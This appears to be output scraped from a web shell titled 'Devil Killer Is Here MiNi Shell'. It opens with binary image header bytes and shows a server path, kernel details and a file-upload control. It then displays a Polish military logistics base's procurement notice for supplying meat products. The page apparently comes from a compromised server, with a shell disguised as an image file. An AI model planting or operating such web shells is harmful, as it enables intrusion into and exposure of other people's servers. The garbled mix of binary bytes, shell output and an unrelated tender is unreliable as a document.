JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221117/0044343401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> D/212/2022 DOSTAWA MIĘSA, PRODUKTÓW MIĘSNO-WĘDLINIARSKICH I TŁUSZCZY ZWIERZĘCYCH. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">2 REGIONALNA BAZA LOGISTYCZNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 142665904</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Marsa 110</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">04-470</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">2rblog.zampub@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.2rblog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Skarb Państwa-jednostka budżetowa, podsektor rządowy </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> D/212/2022 DOSTAWA MIĘSA, PRODUKTÓW MIĘSNO-WĘDLINIARSKICH I TŁUSZCZY ZWIERZĘCYCH. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-319813da-64e2-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00443434</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/2rblog <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.2rblog.wp.mil.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursu oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy.<br/>2. Oferta powinna być sporządzona w języku polskim w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym pod rygorem nieważności. Wykonawca składa ofertę wraz z załącznikami za pośrednictwem platformy zakupowej pod adresem: https://portal.smartpzp.pl/2rblog.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">ROZDZIAŁ XX SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">ROZDZIAŁ XX SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">D/212/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa mięsa, produktów mięsno-wędliniarskich i tłuszczy zwierzęcych dla zamówienia gwarantowanego i opcjonalnego w niżej wymienionych ilościach:<br/>1. Pasztetowa w ilości 12 kg. w tym zamówienie: gwarantowane 6 kg., zamówienie opcjonalne 6 kg.,<br/>2. Salceson włoski w ilości 16 kg. w tym zamówienie: gwarantowane 8 kg., zamówienie opcjonalne 8 kg.,<br/>3. Salceson ozorkowy w ilości 16 kg. w tym zamówienie: gwarantowane 8 kg., zamówienie opcjonalne 8 kg.,<br/>4. Kaszanka z kaszy gryczanej w ilości 50 kg. w tym zamówienie: gwarantowane 15 kg., zamówienie opcjonalne 35 kg.,<br/>5. Salami w ilości 16 kg. w tym zamówienie: gwarantowane 8 kg., zamówienie opcjonalne 8 kg.,<br/>6. Kiełbasa myśliwska w ilości 20 kg. w tym zamówienie: gwarantowane 10 kg., zamówienie opcjonalne 10 kg.,<br/>7. Kiełbasa jałowcowa w ilości 20 kg. w tym zamówienie: gwarantowane 10 kg., zamówienie opcjonalne 10 kg.,<br/>8. Kiełbasa parówkowa w ilości 50 kg. w tym zamówienie: gwarantowane 15 kg., zamówienie opcjonalne 35 kg.,<br/>9. Parówki z szynki w ilości 20 kg. w tym zamówienie: gwarantowane 10 kg., zamówienie opcjonalne 10 kg.,<br/>10. Mortadela w ilości 20 kg. w tym zamówienie: gwarantowane 10 kg., zamówienie opcjonalne 10 kg.,<br/>11. Kiełbasa biała parzona w ilości 75 kg. w tym zamówienie: gwarantowane 25 kg., zamówienie opcjonalne 50 kg.,<br/>12. Kiełbasa podlaska w ilości 60 kg. w tym zamówienie: gwarantowane 30 kg., zamówienie opcjonalne 30 kg.,<br/>13. Kiełbasa wiejska w ilości 60 kg. w tym zamówienie: gwarantowane 30 kg., zamówienie opcjonalne 30 kg.,<br/>14. Kiełbasa śląska w ilości 80 kg. w tym zamówienie: gwarantowane 40 kg., zamówienie opcjonalne 40 kg.,<br/>15. Kiełbasa toruńska w ilości 60 kg. w tym zamówienie: gwarantowane 30 kg., zamówienie opcjonalne 30 kg.,<br/>16. Kiełbasa zwyczajna w ilości 60 kg. w tym zamówienie: gwarantowane 30 kg., zamówienie opcjonalne 30 kg.,<br/>17. Kiełbasa krakowska parzona w ilości 20 kg. w tym zamówienie: gwarantowane 10 kg., zamówienie opcjonalne 10 kg.,<br/>18. Kiełbasa szynkowa wieprzowa w ilości 16 kg. w tym zamówienie: gwarantowane 8 kg., zamówienie opcjonalne 8 kg.,<br/>19. Kiełbasa krakowska sucha w ilości 12 kg. w tym zamówienie: gwarantowane 6 kg., zamówienie opcjonalne 6 kg.,<br/>20. Kiełbasa żywiecka w ilości 20 kg. w tym zamówienie: gwarantowane 10 kg., zamówienie opcjonalne 10 kg.,<br/>21. Kabanosy w ilości 18 kg. w tym zamówienie: gwarantowane 10 kg., zamówienie opcjonalne 8 kg.,<br/>22. Baleron w ilości 20 kg. w tym zamówienie: gwarantowane 10 kg., zamówienie opcjonalne 10 kg.,<br/>23. Polędwica wędzona wieprzowa w ilości 20 kg. w tym zamówienie: gwarantowane 10 kg., zamówienie opcjonalne 10 kg.,<br/>24. Szynka wieprzowa wędzona w ilości 20 kg. w tym zamówienie: gwarantowane 10 kg., zamówienie opcjonalne 10 kg.,<br/>25. Szynka wieprzowa gotowana w ilości 20 kg. w tym zamówienie: gwarantowane 10 kg., zamówienie opcjonalne 10 kg.,<br/>26. Szynka wieprzowa konserwowa w ilości 24 kg. w tym zamówienie: gwarantowane 12 kg., zamówienie opcjonalne 12 kg.,<br/>27. Boczek wędzony parzony w ilości 100 kg. w tym zamówienie: gwarantowane 50 kg., zamówienie opcjonalne 50 kg.,<br/>28. Schab pieczony w ilości 20 kg. w tym zamówienie: gwarantowane 10 kg., zamówienie opcjonalne 10 kg.,<br/>29. Rolada z boczku w ilości 12 kg. w tym zamówienie: gwarantowane 6 kg., zamówienie opcjonalne 6 kg.,<br/>30. Pasztet wieprzowy w ilości 20 kg. w tym zamówienie: gwarantowane 10 kg., zamówienie opcjonalne 10 kg.,<br/>31. Golonka wieprzowa w ilości 12 kg. w tym zamówienie: gwarantowane 6 kg., zamówienie opcjonalne 6 kg.,<br/>32. Ogonówka w ilości 12 kg. w tym zamówienie: gwarantowane 6 kg., zamówienie opcjonalne 6 kg.,<br/>33. Smalec wieprzowy w ilości 80 kg. w tym zamówienie: gwarantowane 40 kg., zamówienie opcjonalne 40 kg.,<br/>34. Słonina w ilości 80 kg. w tym zamówienie: gwarantowane 40 kg., zamówienie opcjonalne 40 kg.,<br/>35. Antrykot wołowy w ilości 200 kg. w tym zamówienie: gwarantowane 100 kg., zamówienie opcjonalne 100 kg.,<br/>36. Wołowina ekstra w ilości 50 kg. w tym zamówienie: gwarantowane 25 kg., zamówienie opcjonalne 25 kg.,<br/>37. Polędwica wołowa w ilości 20 kg. w tym zamówienie: gwarantowane 10 kg., zamówienie opcjonalne 10 kg.,<br/>38. Polędwica wieprzowa w ilości 20 kg. w tym zamówienie: gwarantowane 10 kg., zamówienie opcjonalne 10 kg.,<br/>39. Wołowina zrazowa b/k w ilości 40 kg. w tym zamówienie: gwarantowane 20 kg., zamówienie opcjonalne 20 kg.,<br/>40. Udziec cielęcy b/k w ilości 20 kg. w tym zamówienie: gwarantowane 10 kg., zamówienie opcjonalne 10 kg.,<br/>41. Łopatka cielęca b/k w ilości 20 kg. w tym zamówienie: gwarantowane 10 kg., zamówienie opcjonalne 10 kg.,<br/>42. Karkówka wieprzowa b/k w ilości 400 kg. w tym zamówienie: gwarantowane 200 kg., zamówienie opcjonalne 200 kg.,<br/>43. Karkówka wieprzowa z/k w ilości 40 kg. w tym zamówienie: gwarantowane 20 kg., zamówienie opcjonalne 20 kg.,<br/>44. Łopatka wieprzowa b/k w ilości 400 kg. w tym zamówienie: gwarantowane 200 kg., zamówienie opcjonalne 200 kg.,<br/>45. Schab wieprzowy b/k w ilości 600 kg. w tym zamówienie: gwarantowane 300 kg., zamówienie opcjonalne 300 kg.,<br/>46. Schab wieprzowy z/k w ilości 50 kg. w tym zamówienie: gwarantowane 25 kg., zamówienie opcjonalne 25 kg.,<br/>47. Boczek surowy b/k w ilości 50 kg. w tym zamówienie: gwarantowane 25 kg., zamówienie opcjonalne 25 kg.,<br/>48. Żeberka wieprzowe w ilości 500 kg. w tym zamówienie: gwarantowane 250 kg., zamówienie opcjonalne 250 kg.,<br/>49. Szynka wieprzowa b/k w ilości 400 kg. w tym zamówienie: gwarantowane 200 kg., zamówienie opcjonalne 200 kg.,<br/>50. Mięso wieprzowe od szynki b/k dr. w ilości 50 kg. w tym zamówienie: gwarantowane 25 kg., zamówienie opcjonalne 25 kg.,<br/>51. Golonka wieprzowa z/k w ilości 30 kg. w tym zamówienie: gwarantowane 15 kg., zamówienie opcjonalne 15 kg.,<br/>52. Golonka wieprzowa b/k pak.próżn. w ilości 200 kg. w tym zamówienie: gwarantowane 100 kg., zamówienie opcjonalne 100 kg.,<br/>53. Ozorki wieprzowe w ilości 20 kg. w tym zamówienie: gwarantowane 10 kg., zamówienie opcjonalne 10 kg.,<br/>54. Wątroba wieprzowa w ilości 45 kg. w tym zamówienie: gwarantowane 15 kg., zamówienie opcjonalne 30 kg., </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15110000-2 - Mięso</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15131100-6 - Produkty mięsno-wędliniarskie</p> <p class="mb-0">15400000-2 - Oleje i tłuszcze zwierzęce lub roślinne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Przedmiotem zamówienia jest dostawa mięsa, produktów mięsno-wędliniarskich i tłuszczy zwierzęcych dla zamówienia opcjonalnego w niżej wymienionych ilościach:<br/>1. Pasztetowa w ilości 12 kg. w tym zam. opcjonalne 6 kg.,<br/>2. Salceson włoski w ilości 16 kg. w tym zam. opcjonalne 8 kg.,<br/>3. Salceson ozorkowy w ilości 16 kg. w tym zam. opcjonalne 8 kg.,<br/>4. Kaszanka z kaszy gryczanej w ilości 50 kg. w tym zam. opcjonalne 35 kg.,<br/>5. Salami w ilości 16 kg. w tym zam. opcjonalne 8 kg.,<br/>6. Kiełbasa myśliwska w ilości 20 kg. w tym zam. opcjonalne 10 kg.,<br/>7. Kiełbasa jałowcowa w ilości 20 kg. w tym zam. opcjonalne 10 kg.,<br/>8. Kiełbasa parówkowa w ilości 50 kg. w tym zam. opcjonalne 35 kg.,<br/>9. Parówki z szynki w ilości 20 kg. w tym zam. opcjonalne 10 kg.,<br/>10. Mortadela w ilości 20 kg. w tym zam. opcjonalne 10 kg.,<br/>11. Kiełbasa biała parzona w ilości 75 kg. w tym zam. opcjonalne 50 kg.,<br/>12. Kiełbasa podlaska w ilości 60 kg. w tym zam. opcjonalne 30 kg.,<br/>13. Kiełbasa wiejska w ilości 60 kg. w tym zam. opcjonalne 30 kg.,<br/>14. Kiełbasa śląska w ilości 80 kg. w tym zam. opcjonalne 40 kg.,<br/>15. Kiełbasa toruńska w ilości 60 kg. w tym zam. opcjonalne 30 kg.,<br/>16. Kiełbasa zwyczajna w ilości 60 kg. w tym zam. opcjonalne 30 kg.,<br/>17. Kiełbasa krakowska parzona w ilości 20 kg. w tym zam. opcjonalne 10 kg.,<br/>18. Kiełbasa szynkowa wieprzowa w ilości 16 kg. w tym zam. opcjonalne 8 kg.,<br/>19. Kiełbasa krakowska sucha w ilości 12 kg. w tym zam. opcjonalne 6 kg.,<br/>20. Kiełbasa żywiecka w ilości 20 kg. w tym zam. opcjonalne 10 kg.,<br/>21. Kabanosy w ilości 18 kg. w tym zam. opcjonalne 8 kg.,<br/>22. Baleron w ilości 20 kg. w tym zam. opcjonalne 10 kg.,<br/>23. Polędwica wędzona wieprzowa w ilości 20 kg. w tym zam. opcjonalne 10 kg.,<br/>24. Szynka wieprzowa wędzona w ilości 20 kg. w tym zam. opcjonalne 10 kg.,<br/>25. Szynka wieprzowa gotowana w ilości 20 kg. w tym zam. opcjonalne 10 kg.,<br/>26. Szynka wieprzowa konserwowa w ilości 24 kg. w tym zam. opcjonalne 12 kg.,<br/>27. Boczek wędzony parzony w ilości 100 kg. w tym zam. opcjonalne 50 kg.,<br/>28. Schab pieczony w ilości 20 kg. w tym zam. opcjonalne 10 kg.,<br/>29. Rolada z boczku w ilości 12 kg. w tym zam. opcjonalne 6 kg.,<br/>30. Pasztet wieprzowy w ilości 20 kg. w tym zam. opcjonalne 10 kg.,<br/>31. Golonka wieprzowa w ilości 12 kg. w tym zam. opcjonalne 6 kg.,<br/>32. Ogonówka w ilości 12 kg. w tym zam. opcjonalne 6 kg.,<br/>33. Smalec wieprzowy w ilości 80 kg. w tym zam. opcjonalne 40 kg.,<br/>34. Słonina w ilości 80 kg. w tym zam. opcjonalne 40 kg.,<br/>35. Antrykot wołowy w ilości 200 kg. w tym zam. opcjonalne 100 kg.,<br/>36. Wołowina ekstra w ilości 50 kg. w tym zam. opcjonalne 25 kg.,<br/>37. Polędwica wołowa w ilości 20 kg. w tym zam. opcjonalne 10 kg.,<br/>38. Polędwica wieprzowa w ilości 20 kg. w tym zam. opcjonalne 10 kg.,<br/>39. Wołowina zrazowa b/k w ilości 40 kg. w tym zam. opcjonalne 20 kg.,<br/>40. Udziec cielęcy b/k w ilości 20 kg. w tym zam. opcjonalne 10 kg.,<br/>41. Łopatka cielęca b/k w ilości 20 kg. w tym zam. opcjonalne 10 kg.,<br/>42. Karkówka wieprzowa b/k w ilości 400 kg. w tym zam. opcjonalne 200 kg.,<br/>43. Karkówka wieprzowa z/k w ilości 40 kg. w tym zam. opcjonalne 20 kg.,<br/>44. Łopatka wieprzowa b/k w ilości 400 kg. w tym zam. opcjonalne 200 kg.,<br/>45. Schab wieprzowy b/k w ilości 600 kg. w tym zam. opcjonalne 300 kg.,<br/>46. Schab wieprzowy z/k w ilości 50 kg. w tym zam. opcjonalne 25 kg.,<br/>47. Boczek surowy b/k w ilości 50 kg. w tym zam. opcjonalne 25 kg.,<br/>48. Żeberka wieprzowe w ilości 500 kg. w tym zam. opcjonalne 250 kg.,<br/>49. Szynka wieprzowa b/k w ilości 400 kg. w tym zam. opcjonalne 200 kg.,<br/>50. Mięso wieprzowe od szynki b/k dr. w ilości 50 kg. w tym zam. opcjonalne 25 kg.,<br/>51. Golonka wieprzowa z/k w ilości 30 kg. w tym zam. opcjonalne 15 kg.,<br/>52. Golonka wieprzowa b/k pak.próżn. w ilości 200 kg. w tym zam. opcjonalne 100 kg.,<br/>53. Ozorki wieprzowe w ilości 20 kg. w tym zam. opcjonalne 10 kg.,<br/>54. Wątroba wieprzowa w ilości 45 kg. w tym zam. opcjonalne 30 kg., <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Wykonawca został dopuszczony do produkcji lub obrotu artykułami spożywczymi- Ustawa z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2022r. poz.2132 t.j.); ;<br/>2. Wykonawca posiadał zgłoszoną działalność gospodarczą w zakresie produkcji, składowania, konfekcjonowania i obrotu artykułami rolno-spożywczymi, do wojewódzkiego inspektora jakości handlowej artykułów rolno-spożywczych– Ustawa z dnia 21 grudnia 2000r. roku o jakości handlowej artykułów rolno-spożywczych (Dz. U. z 2022r. poz.1688 ze zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą brak podstaw do wykluczenia z powodu niespełnienia warunków określonych w art. 108 ust. 1 oraz 109 ust. 1 pkt. 1, 4 i 7 ustawy Prawo zamówień publicznych. Zamawiający uzna, że Wykonawca nie podlega wykluczeniu z postępowania, zgodnie z art. 108 ust. 1 oraz 109 ust. 1 pkt. 1, 4 i 7 ustawy Prawo zamówień publicznych, jeżeli z przedstawionych przez Wykonawcę oświadczeń i dokumentów wynikać będzie, że nie występują uwarunkowania określone w art.108 ust. 1 oraz 109 ust. 1 pkt. 1, 4 i 7 ustawy Prawo Zamówień Publicznych.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>1. w przypadku, gdy ofertę składa Wykonawca, który produkuje lub wprowadza do obrotu żywność pochodzenia niezwierzęcego lub zwierzęcego lub żywność zawierającą jednocześnie środki spożywcze pochodzenia 